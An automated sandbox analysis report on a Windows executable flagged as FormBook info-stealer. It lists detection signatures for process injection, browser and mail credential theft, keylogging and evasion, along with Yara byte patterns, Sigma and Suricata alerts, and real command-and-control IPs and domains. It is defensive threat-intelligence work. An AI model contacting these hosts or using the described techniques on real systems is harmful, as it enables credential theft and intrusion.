Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_987654345678.exe

Overview

General Information

Sample name:PO_987654345678.exe
Analysis ID:1503298
MD5:4214be98801c44f69b60490a3321e940
SHA1:df33635a4f458821d10ce62860a043a960ced09f
SHA256:416e839248fccc61a17a02d1513127612b89425f45ddf603800f1def225adb07
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO_987654345678.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\PO_987654345678.exe" MD5: 4214BE98801C44F69B60490A3321E940)
    • svchost.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\PO_987654345678.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ftfqgrfncDSuar.exe (PID: 2676 cmdline: "C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 7716 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • ftfqgrfncDSuar.exe (PID: 4908 cmdline: "C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c2e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e8e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16942:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f6e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17742:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ParentImage: C:\Users\user\Desktop\PO_987654345678.exe, ParentProcessId: 7592, ParentProcessName: PO_987654345678.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ProcessId: 7608, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ParentImage: C:\Users\user\Desktop\PO_987654345678.exe, ParentProcessId: 7592, ParentProcessName: PO_987654345678.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO_987654345678.exe", ProcessId: 7608, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-09-03T10:44:01.742289+0200
            SID:2855464
            Severity:1
            Source Port:64979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:01.742289+0200
            SID:2856318
            Severity:1
            Source Port:64979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:04.484356+0200
            SID:2855464
            Severity:1
            Source Port:64995
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:07.030105+0200
            SID:2855464
            Severity:1
            Source Port:64996
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:39.695804+0200
            SID:2855464
            Severity:1
            Source Port:65001
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:04.760330+0200
            SID:2855464
            Severity:1
            Source Port:65008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:34.598530+0200
            SID:2855464
            Severity:1
            Source Port:64999
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:51.843934+0200
            SID:2855464
            Severity:1
            Source Port:65019
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:37.934520+0200
            SID:2855464
            Severity:1
            Source Port:65015
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:33.730485+0200
            SID:2855464
            Severity:1
            Source Port:64989
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:47.751813+0200
            SID:2855464
            Severity:1
            Source Port:65003
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:41.933384+0200
            SID:2855464
            Severity:1
            Source Port:64991
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:28.528096+0200
            SID:2855464
            Severity:1
            Source Port:64987
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:54.223315+0200
            SID:2855464
            Severity:1
            Source Port:65020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:43:49.860515+0200
            SID:2855464
            Severity:1
            Source Port:64976
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:18.924552+0200
            SID:2855464
            Severity:1
            Source Port:65012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:02.214733+0200
            SID:2855464
            Severity:1
            Source Port:65007
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:09.574571+0200
            SID:2855464
            Severity:1
            Source Port:64997
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:16.082124+0200
            SID:2855464
            Severity:1
            Source Port:65011
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:43:52.570998+0200
            SID:2855464
            Severity:1
            Source Port:64977
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:31.069926+0200
            SID:2855464
            Severity:1
            Source Port:64988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:44.455444+0200
            SID:2855464
            Severity:1
            Source Port:64992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:07.048957+0200
            SID:2855464
            Severity:1
            Source Port:64981
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:43.036728+0200
            SID:2855464
            Severity:1
            Source Port:65017
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:51.371433+0200
            SID:2855464
            Severity:1
            Source Port:65004
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:40.500505+0200
            SID:2855464
            Severity:1
            Source Port:65016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:07.584283+0200
            SID:2855464
            Severity:1
            Source Port:65009
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:52.847260+0200
            SID:2855464
            Severity:1
            Source Port:65005
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:56.818565+0200
            SID:2855464
            Severity:1
            Source Port:65021
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:47.032770+0200
            SID:2855464
            Severity:1
            Source Port:64993
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:43:47.542947+0200
            SID:2855464
            Severity:1
            Source Port:64975
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:46:21.417014+0200
            SID:2855464
            Severity:1
            Source Port:65013
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:44:04.255956+0200
            SID:2855464
            Severity:1
            Source Port:64980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-03T10:45:37.169364+0200
            SID:2855464
            Severity:1
            Source Port:65000
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: PO_987654345678.exeVirustotal: Detection: 37%Perma Link
            Source: PO_987654345678.exeReversingLabs: Detection: 42%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO_987654345678.exeJoe Sandbox ML: detected
            Source: PO_987654345678.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftfqgrfncDSuar.exe, 00000002.00000002.4118133929.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp, ftfqgrfncDSuar.exe, 00000007.00000000.1919962522.0000000000FCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_987654345678.exe, 00000000.00000003.1656395524.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, PO_987654345678.exe, 00000000.00000003.1656295045.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1754906173.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1850618671.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1756794184.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.4118749012.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1856952103.0000000004997000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4118749012.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1854994235.00000000047E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1850544431.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818824564.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000003.1790761770.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000002.00000002.4117923087.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.4119101815.000000000516C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4117707288.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000331C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019BFC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F6DBBE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F768EE FindFirstFileW,FindClose,0_2_00F768EE
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00F7698F
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F6D076
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F6D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F6D3A9
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F79642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F79642
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F7979D
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F79B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00F79B2B
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F75C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00F75C97
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099C750 FindFirstFileW,FindNextFileW,FindClose,3_2_0099C750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0099C886 FindFirstFileW,FindNextFileW,FindClose,3_2_0099C886
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax3_2_00989B00
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h3_2_049E04DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64979 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:64979 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64980 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64976 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64975 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64997 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64993 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64991 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64992 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65007 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65016 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65019 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65003 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65020 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65001 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65008 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65012 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64996 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65009 -> 218.247.68.184:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64995 -> 5.144.130.52:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65004 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64977 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65011 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65015 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65005 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64987 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65017 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64988 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64981 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64989 -> 162.0.239.141:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65000 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65013 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:64999 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65021 -> 188.114.97.3:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.asian-massage-us.xyz
            Source: DNS query: www.golbasi-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: HOSTIRAN-NETWORKIR HOSTIRAN-NETWORKIR
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
